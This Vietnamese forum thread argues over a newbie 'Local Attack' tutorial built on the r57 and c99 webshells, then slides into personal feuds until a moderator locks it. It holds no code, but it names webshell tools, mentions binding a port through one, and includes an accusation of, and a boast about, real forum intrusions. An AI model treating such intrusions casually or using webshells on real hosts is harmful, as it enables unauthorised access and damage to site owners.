Dù sao thì Girl No0B thử tiếp tục coi nào ^____^ ,

Tản mạn Local Attack :D

GirL Noob — GMT

mrro wrote:

Thiệt tình nói bồ Girl Noob đừng buồn, tôi đọc từ đầu đến giờ cũng hơn 3 trang rồi mà vẫn chưa thấy chỗ nào là của bồ Girl Noob tự viết hết. Những chi tiết bồ Girl Noob đưa ra đều hoặc sử dụng công cụ nào đó của người khác, hoặc khai thác một lỗi phần mềm đã biết nào đó, tôi vẫn chưa thấy được một chút gì đó gọi là sáng tạo hay của riêng cá nhân bồ Girl Noob. Nếu phần kế tiếp bồ cũng chỉ tiếp tục quanh đi quẩn lại như thế thì dẫu bồ có get root được server, tôi cũng chẳng có hứng thú đọc tiếp. Nếu quả thật như thế, tôi chân thành khuyên bồ không nên viết tiếp nữa làm gì, mà nên dành thời gian để làm những việc khác có ích hơn, chẳng hạn như đọc sách. Vài góp ý, -m

Cảm ơn ý kiến của anh , bài viết này ghi rõ dành cho đối tượng là newbie tham khảo cho vui chứ còn đối với những người đã biết thì thật đúng là chẳng có hứng thú gì để xem :lol:) . Vâng , em sẽ đi làm chuyện khác có ích hơn như lời khuyên của anh và đề tài này đặt dấu chấm hết tại đây là hoàn toàn hợp lý .

Tản mạn Local Attack :D

conmale — GMT

E hèm... mấy năm trời rồi mà cách viết, cách dùng từ... vẫn không hề thay đổi.

nhocbmt wrote:

2. To 1 số cá nhân : Trích anh conmale :
Hừm.... lại r57, c99. Không biết chừng nào mới lớn khôn.
Em ko biết câu này anh chỉ nói riêng đến r57 , c99 hay anh là ám chỉ chung về webshell và remv ? Nếu anh ám chỉ chung về webshell ? OK -> Những attacker nào " khôn ngoan " thì chưa ai lớn khôn cả :) Nếu tui có nói sai thì mọi người hãy tự hõi lòng ý ! Giả sữ khi attack thành công , để thuận lợi cho công việc tiếp theo , chắc chắn rằng các bạn sẽ sữ dụng đến công cụ đại loại hay giống như thế ( ko cần biết là tool bạn tự viết hay là public source ) ... nó giúp các bạn rất nhiều để đạt đến "mục tiêu" phải ko nào ?

Nếu em nắm trong tay từng function và mọi chi tiết ẩn / hiện của một cái script ai đó viết, thậm chí em còn có khả năng điều chỉnh, cải tiến để nó làm việc theo ý em thì em không việc gì phải tự ái và phải phát biểu như trên. Nếu em không làm được chuyện đó mà chỉ lôi nó về, tìm cách cài trên một vài server bị lỗ hổng ở đó và kết thúc bằng... "hacked by..." thì em nên tự ái. Tự ái không phải vì ai đó "ám chỉ" rằng em là "kiddie", chẳng biết cái gì cho ngọn ngành mà vẫn "hacked by..." đều đều mà em nên tự ái là tạo sao em không đủ khả năng đọc, khám phá, khai triển những thứ ai đã đã viết sẵn. "Mục tiêu" của một kẻ muốn chinh phục, muốn thử nghiệm một cách nghiêm túc khác hẳn với "mục tiêu" của một kiddie. Kiddie không cần biết, không cần quan tâm đến những dung hại (ngay cả dung hại xảy ra với chính mình) mà chỉ quan tâm đến 1 cái tool nào đó có thể làm được những điều "kỳ diệu". Bởi thế, không phải mục tiêu nào cũng như nhau và có giá trị như nhau. Đến chừng nào em vẫn chưa nhận ra được điều này, em vẫn nên tiếp tục tự ái vì "vẫn chưa lớn khôn".

nhocbmt wrote:

Còn về chữ DEVELOP , em ko hiểu ? vd 1 open source , và mình phát triển thêm chức năng nào đó cho source đó thì có được ghi "thêm" chữ develop by ko ạ ? Nếu được thì ko nên nói NAVARO như thế :) Còn ko thì em cũng hok bít luôn :D hehe ! - Vài lời -nhocbmt

Khi em tham gia một open source project, phần nào em viết, phần đó em kèm tên của em vào (trong code). Thường cái hiệu "developed by" dành cho tên nhóm chớ chẳng có ai chơi trò đưa tên cá nhân mình vào cái khoản "developed by" vì nó vừa phô, vừa buồn cười. Một nhóm vài người hoặc vài trăm người tham gia project mà ông nào cũng "developed by" thì cái phần copyright của nó ra cái hình thù gì? Muốn thêm bao nhiêu "Developed by" lại không đươc? nhưng người có tự trọng không làm những chuyện như thế. Bởi thế, rất nên nêu ra chuyện này để rút kinh nghiệm.

Tản mạn Local Attack :D

kid_b0d — GMT

Bài viết giống như 1 chuyến thám hiểm nhưng có quá nhiều chi tiết phụ , QA tìm hiểu + suy luận kỹ quá nên đã đi sai vấn đề chính cần bàn .

Tản mạn Local Attack :D

Thuongtamnhan — GMT

nói chung thì girlnoob bỏ sông sức ra viết: có công viết,còn lại thì quả thật là có vẻ như đều lấy ở phần hướng dẫn sử dụng , cái gọi là sáng tạo quả là chưa thấy giống như ai đó vừa nói, nếu như bồ đã vào đây viết tut tức là bồ phảii hết sức sáng tạo, từ cái công cụ để hack cho đến cách thức hack, mà 2 cái này bổ đều không có, nếu cái này bồ đem sang vài forum khác viết thì có lẽ sẽ nhận được vài câu kiểu như: hay quá, bro phát huy nhá.....nhưng ở đây thì khác , tự tìm lỗi mà hack, cao hơn là tìm cách thức mới mà hack chứ không phải là dựa vào vài con r75 hay cái gì gì đó mà mấy cái con đó thực ra đúng như ai đó đã nói nó đều chứa vài con backdoor thậm chí hoạt động kiểu rootkit khá kin đáo, thế nên tưởng là mình xơi được người ta hóa ra chính mình cũng đang bị xơi mà không biết.

Re: Tản mạn Local Attack :D

marriottvn — GMT

Thiệt tình nói bồ Girl Noob đừng buồn, tôi đọc từ đầu đến giờ cũng hơn 3 trang rồi mà vẫn chưa thấy chỗ nào là của bồ Girl Noob tự viết hết. Những chi tiết bồ Girl Noob đưa ra đều hoặc sử dụng công cụ nào đó của người khác, hoặc khai thác một lỗi phần mềm đã biết nào đó, tôi vẫn chưa thấy được một chút gì đó gọi là sáng tạo hay của riêng cá nhân bồ Girl Noob.

Ai cũng biết nó là vậy nhưng không ai chịu share cả, h có người share ra lại bị nói là hông có sáng tạo, thiệt là Vietnamese ^^

Nếu phần kế tiếp bồ cũng chỉ tiếp tục quanh đi quẩn lại như thế thì dẫu bồ có get root được server, tôi cũng chẳng có hứng thú đọc tiếp. Nếu quả thật như thế, tôi chân thành khuyên bồ không nên viết tiếp nữa làm gì, mà nên dành thời gian để làm những việc khác có ích hơn, chẳng hạn như đọc sách. Vài góp ý, -m

bác "mod" hông đọc nhưng cũng đừng delete hen, để noob vào đọc cho khuây khỏa, chắc bác mrro "có nhiều root" nên hổng cần get chi cho mệt :D vài lời

Tản mạn Local Attack :D

qhoa83 — GMT

Có lẽ nhờ những bài viết của GN mà tôi hiểu được và hình dung được sự nguy hiểm của R57 va C99 . Cách hack không có gì mới nhưng nguy cơ tiềm ẩn trên các hệ thống là rất nhiều. Nếu ko có bài viết này chắc tôi chắc cũng không hiểu thêm được hack là cái gì. Có lẽ những cái cao siêu hơn phải từ từ mới tiêu hóa được.

Tản mạn Local Attack :D

baothu — GMT

Qua bên vnmagic.net thì thấy cái này Đầu tiên tôi xin tự giới thiệu tôi là một trong số những thành viên của forum Nokia Friends (www.nokiafriends.vn). Không hiểu forum của chúng tôi mắc lỗi gì với một trong số những member của VNmagic (girl noob) mà khiến cho member này giận để đến mức attack forum của chúng tôi. Không hiểu có phải là thù hằn cá nhân hay chỉ là để chứng tỏ mình là người tài giỏi qua việc phá hoại sức lao động của người khác. Forum của chúng tôi đơn thuần chỉ là một forum kỹ thuật về điện thoại nokia, thế nên về kỹ thuật bảo vệ hay chống h4ck thì có lẽ không phải là sở trường. Bạn có thể phá forum của chúng tôi vì chúng tôi kém,chúng tôi không biết tự bảo vệ mình, vậy bạn có nghĩ đến lúc nào đó có người giỏi hơn các bạn và cũng lại phá forum của các bạn không? Forum là sân chơi chung cho những người ham mê internet vào tham gia đóng góp mỗi ngày, nó cũng giống như món ăn tinh thần của mỗi người vậy, thiết nghĩ thay bằng phá hoại như vậy bạn chỉ ra những chỗ hổng trong bảo mật của forum thì có lẽ tốt hơn..... Có lẽ GN đang tự đánh bóng tên tuổi cho vnmagic(và her) chăng?.Hay chưa lên ông nghè đã đe hàng tổng rồi?

Tản mạn Local Attack :D

mrro — GMT

Ai cũng biết nó là vậy nhưng không ai chịu share cả, h có người share ra lại bị nói là hông có sáng tạo, thiệt là Vietnamese ^^

Hì xin lỗi, nhưng tôi tự hỏi, có ai đó học được gì từ topic này ngoài chuyện hướng dẫn sử dụng hai cái script có sẵn? Và nếu ai đó thay vì dành thời gian nghiền ngẫm những topic như vậy, dùng để đọc sách về Linux chẳng hạn, người đó có dễ dàng hiểu được chuyện gì thực sự đang xảy ra khi tôi click vào cái nút đó, hay nhập vào cái lệnh này ở ngay chỗ đó rồi nhấn enter? Sở dĩ tôi không thích topic này đơn giản vì nếu đã là topic hướng đến những người mới bắt đầu, tác giả nên giải thích tường tận chuyện gì thực sự xảy ra khi sử dụng các công cụ (và nếu không có các script có sẵn thì phải làm gì). Ví dụ như khi tôi nhập vào 1221 và nhấn nút Bind Port, thì đoạn code nào sẽ được thực thi và ý nghĩa của đoạn code đó là gì. Ở đây tác giả chỉ viết theo kiểu, 1. click chỗ này, 2. nhập cái này vào chỗ đó, 3. enter, 4. rồi hack được rồi đó. BTW, cái câu "thiệt là Vietnamese" của bồ rất khó nghe, chẳng biết nó có làm những người khác có suy nghĩ gì về bồ, riêng bản thân tôi chưa bao giờ đánh giá cao những người mở miệng ra là "thiệt là Vietnamese".

bác "mod" hông đọc nhưng cũng đừng delete hen, để noob vào đọc cho khuây khỏa, chắc bác mrro "có nhiều root" nên hổng cần get chi cho mệt :D

Chưa có ai đề cập gì đến chuyện xóa hay đóng topic này cả. Tôi chỉ nói là tôi sẽ không đọc và không tham gia bình luận về nó bởi vì tôi không muốn phí thời gian làm những chuyện vô bổ. -m

Tản mạn Local Attack :D

phuongbich — GMT

Riêng tui .Tui chẳng là hacker gì cả , tui chỉ thích đi xem mọi hoạt động của người khác , Nhưng tôi có một ý kiến chung là . Ở đây Tui thấy toàn là người có tiếng tăm trên UD . Nhưng thử hỏi lam sao để có cái danh này . Tấ cả đều là do mọi người viết bài , khai thác được lỗ hổng bảo mật , hack , biết cách sử dụng này lọ , ... Nói thật tui cũng có thể làm được tất cả mọi thứ nhưng có thể chỉ ở từng giới hạn của bản thân mình . Đọc từ đầu topic đến giờ tui thấy quá nhiều người vào phê bình bạn GN ,nghỉ mà thật đáng ghét . Nếu ai biết rồi xin mời sang topic khác tham khảo , Nếu nói như ai đó nhưng điều bạn GN nói chỉ là search hoạc đúc kết kinh nghiệm ko có gì sáng tạo . Tui thử hỏi bạn thử nghĩ lại bản thân bạn xem . Nếu bạn tìm được một erro về một software nào đó rồi bạn hack nó , sau đó bạn search trên mạng người ta đã tìm ra erro này lâu thì bán sẽ thất vọng ah . AI dám tự coi mình là hacker giỏi nhất VN hoạc world , Đây là diễn đàn học hỏi mọi người nên cùng nhau học hỏi cùng nhau phân tích , ko nên người nào cũng vào thêm câu dạy đời câu . Tui . nếu ai giận xin lỗi trước .

Re: Tản mạn Local Attack :D

Zeros — GMT

Hi all, vì titile là "Tản mạn" + "Local Attack" nên thay vì hiểu topic này theo hướng kỹ thuật đơn thuần thì theo mình hãy nên nhìn nó "thoáng" hơn 1 chút thì tốt hơn cho tất cả mọi người. Đối với 1 người có "kỹ thuật", kỹ năng thực sự thì những bài viết thế này không giải quyết được vấn đề gì, vậy thì hãy coi nó là "Tản mạn" không hơn không kém, được không các bác ? Còn những người khác nếu cảm thấy hứng thú với bài "dạy hack step by step" bằng shell của GN (như mình chẳng hạn :oops: ) thì nên tập trung những câu hỏi liên quan đến "kỹ thuật" chứ đừng lan man, loãng chủ đề, ok ? ~~~~~ @GN : còn tiếp nữa không bạn ??? Mình không thích làm theo "step by step" mà không hiểu gì :P) nhưng bài viết của bạn vẫn có ích cho mình xét theo 1 phương diện nào đấy, thanks U !

Tản mạn Local Attack :D

TQN — GMT

Nhảm nhí cho mấy hec cơ này quá, cứ lo đấu đá nhau.

Re: Tản mạn Local Attack :D

marriottvn — GMT

Hì xin lỗi, nhưng tôi tự hỏi, có ai đó học được gì từ topic này ngoài chuyện hướng dẫn sử dụng hai cái script có sẵn? Và nếu ai đó thay vì dành thời gian nghiền ngẫm những topic như vậy, dùng để đọc sách về Linux chẳng hạn, người đó có dễ dàng hiểu được chuyện gì thực sự đang xảy ra khi tôi click vào cái nút đó, hay nhập vào cái lệnh này ở ngay chỗ đó rồi nhấn enter?

Tôi cũng chẳng biết tí tẹo gì về Linux, mà cũng chẳng muốn biết, cái này cũng tùy mỗi người. Tôi đọc bài viết này không phải là để học Linux, cũng không phải để thành hacker gì hết. Cái tôi học ở bài viết này đó là sự nguy hiểm của Local Attack thông qua webshell, nó giúp ích khi 1 khách hàng của tôi cần tư vấn về hosting, thế thôi.

BTW, cái câu "thiệt là Vietnamese" của bồ rất khó nghe, chẳng biết nó có làm những người khác có suy nghĩ gì về bồ, riêng bản thân tôi chưa bao giờ đánh giá cao những người mở miệng ra là "thiệt là Vietnamese".

Ở đây đang nói tới cái tính giấu nghề của các bác nhà ta, vậy thôi. Vả lại tôi cũng không cần bro phải đánh giá cao thấp gì cả, hay là làm mod rồi lại đi đánh giá này nọ, thiệt là tức cười.

Chưa có ai đề cập gì đến chuyện xóa hay đóng topic này cả. Tôi chỉ nói là tôi sẽ không đọc và không tham gia bình luận về nó bởi vì tôi không muốn phí thời gian làm những chuyện vô bổ.

Ok, gud

Tản mạn Local Attack :D

pnco — GMT

Tôi nghĩ rằng nếu bạn girl noob không tiếp tục và mấy bạn có những tranh luận ngoài kỹ thuật thì topic nên được đóng.

Re: Tản mạn Local Attack :D

vikjava — GMT

đầu tiên là bàn kỹ thuật, sau đó tranh luận ân oán giang hồ làm cho cái topic u ám kinh khủng. Mục đích ban đầu của GN trình bày kinh nghiệm về local attack, dù sao cũng đáng hoan nghênh . Nhưng do nhiều vụ tranh cãi, GN không kìm được thành ra loãng ........ Có vẻ điều đó làm cho người dùng khó chịu . @mrro : nhiều khi người ta dùng mấy cái này thấy hay quá hoặc gặp khó khăn họ sẽ tìm hiểu những cái mrro nói . Có thể nó là động lực ban đầu. Ý kiến cá nhân của mình là thế.

Tản mạn Local Attack :D

rgv — GMT

mình xin đưa ra 1 số vấn đề góp ý cùng mọi người ở đây 1) mình nhớ khi chat với Girl noob thì em ấy nói " em ko muốn phô trương , ko muốn này nọ , về vnmagic , vậy em post bài viết này ở đây để làm gì ? chả phải là muốn vnmagic nổi tiếng hay sao ? 2) ẻm nhận định về conmale trước mình là " hắn có cái giỏi nhưng cũng có cái noob . noob ở chỗ là luôn tự nhận mình giỏi . " còn ko biết ẻm ấy chat với anh conmale như thế nào nhưng cũng cho em xin lỗi a conmale là em đã cho nick của anh cho ẻm ấy . vậy mà vào topic này đọc cảm giác nịnh bợ đã được phát huy . 3 ) .......... quá nhiều vấn đề muốn nói nữa nhưng sẽ lại là cá nhân ^_^ kết luận : Anh ko tin được em

Tản mạn Local Attack :D

dinhcaohack — GMT

ThangCuEm wrote:

.... Ở đây Tui thấy toàn là người có tiếng tăm trên UD . Nhưng thử hỏi lam sao để có cái danh này . Tấ cả đều là do mọi người viết bài , khai thác được lỗ hổng bảo mật , hack , biết cách sử dụng này lọ , ... Nói thật tui cũng có thể làm được tất cả mọi thứ nhưng có thể chỉ ở từng giới hạn của bản thân mình . ... Nếu bạn tìm được một erro ....

:D Toàn người tiếng tăm và cái "danh" cùng nhưng từ ngữ rất sai chính tả + nữa Anh nữa Việt của cậu tớ chỉ quote lại cái câu này thôi :

rgv wrote:

kết luận : Anh ko tin được em

Hì hì, hóa ra cậu tin em í à ... tớ chưa tin em ấy 1 phút nào kể từ cái sáng em ấy chửi tớ ( sáng sau cái đêm mà tớ nghịch vnmagic rồi em í phải lạy lục van xin tớ với ku des HCV restore lại cho em í cái DB --- rồi sáng đấy em í chuyển server =)) )

Tôi cũng chẳng biết tí tẹo gì về Linux, mà cũng chẳng muốn biết, cái này cũng tùy mỗi người. Tôi đọc bài viết này không phải là để học Linux, cũng không phải để thành hacker gì hết. Cái tôi học ở bài viết này đó là sự nguy hiểm của Local Attack thông qua webshell, nó giúp ích khi 1 khách hàng của tôi cần tư vấn về hosting, thế thôi.

Ôi bạn gì ơi cậu làm nghề gì thế =)) , "nó giúp ích khi 1 khách hàng của tôi cần tư vấn về hosting" ... cái local attack rẻ mạt này cậu hiểu được có nghĩa là cậu chống được à .. như mrro nói, nó step by step đến nỗi 1 click 2 điền 3 en tơ =)) ... 1 nhà bảo mật cần cái nhìn tổng quát okie ? :D

Re: Tản mạn Local Attack :D

baothu — GMT

posts đi lạc xa quá với chủ đề nếu GN ko còn tiếp tục với chủ đề này thì mod nên close lại ,tránh việc cãi vả nhiều quá lại sinh ra chuyện không hay anyway,topic này đọc mấy cái đầu còn có chút giá trị tham khảo (còn mang tính kỹ thuật) mấy cái post sau thì chính tác giả cũng bắt đầu lạc đề ==> chán

Tản mạn Local Attack :D

gsmth — GMT

@dinhcaohack cũng quote nhầm à!!! Bạn ThangCuEm đâu có phát biểu câu:

.... Ở đây Tui thấy toàn là người có tiếng tăm trên UD . Nhưng thử hỏi lam sao để có cái danh này . Tấ cả đều là do mọi người viết bài , khai thác được lỗ hổng bảo mật , hack , biết cách sử dụng này lọ , ... Nói thật tui cũng có thể làm được tất cả mọi thứ nhưng có thể chỉ ở từng giới hạn của bản thân mình . ... Nếu bạn tìm được một erro ....

Re: Tản mạn Local Attack :D

kingasawa — GMT

Ân oán ngày xưa của VNMAGIC là chiện quá khứ của kingasawa và vietluv , pé Quỳnh Anh ko nên tranh luận 1 cách ngang hàng với các bậc tiền bối ( như vậy là "hỗn") .... với cái tuổi 17 của pé thì còn phải học hỏi thêm nhiều ... pé có thể tiếp tục bài viết của mình nếu hết thì pé nên xin mod lock topic lại để tránh tình trạng mất đoàn kết nội bộ .... các bậc tiền bối ko rảnh đâu tranh luận với pé wài đc ....

Tản mạn Local Attack :D

kienmanowar — GMT

hehe dch em, quote nhầm rồi kìa... anh TCE viết thế hồi nào!! Bài viết này dần dần đi lạc chủ đề rồi :|

Tản mạn Local Attack :D

Mr.Khoai — GMT

khoai xin nhắc nhở lần cuối với mọi người: Các post không bàn về vấn đề Local Attack hoặc vấn đề thâm nhập thì xin mời post ở một topic khác. Nếu tình trạng đả kích nhau vẫn còn tiếp diễn mà GirL Noob không còn tiếp tục post các bước tiếp theo thì khoai sẽ khóa topic này lại. khoai

Tản mạn Local Attack :D

nlfb — GMT

(Ngáp) lock lại đi khoai, girl noob vắng bóng 3 bữa nay rồi, chỉ thấy lượng mem đông --> spam càng nhiều thôi

Re: Tản mạn Local Attack :D

conmale — GMT

Tôi lock chủ đề này lại vì nó đã chuyển sang hướng khác và hướng này không được tiếp nhận trên diễn đàn HVA. Những ai có khúc mắc cá nhân, vui lòng giải quyết ở nơi khác thích hợp hơn.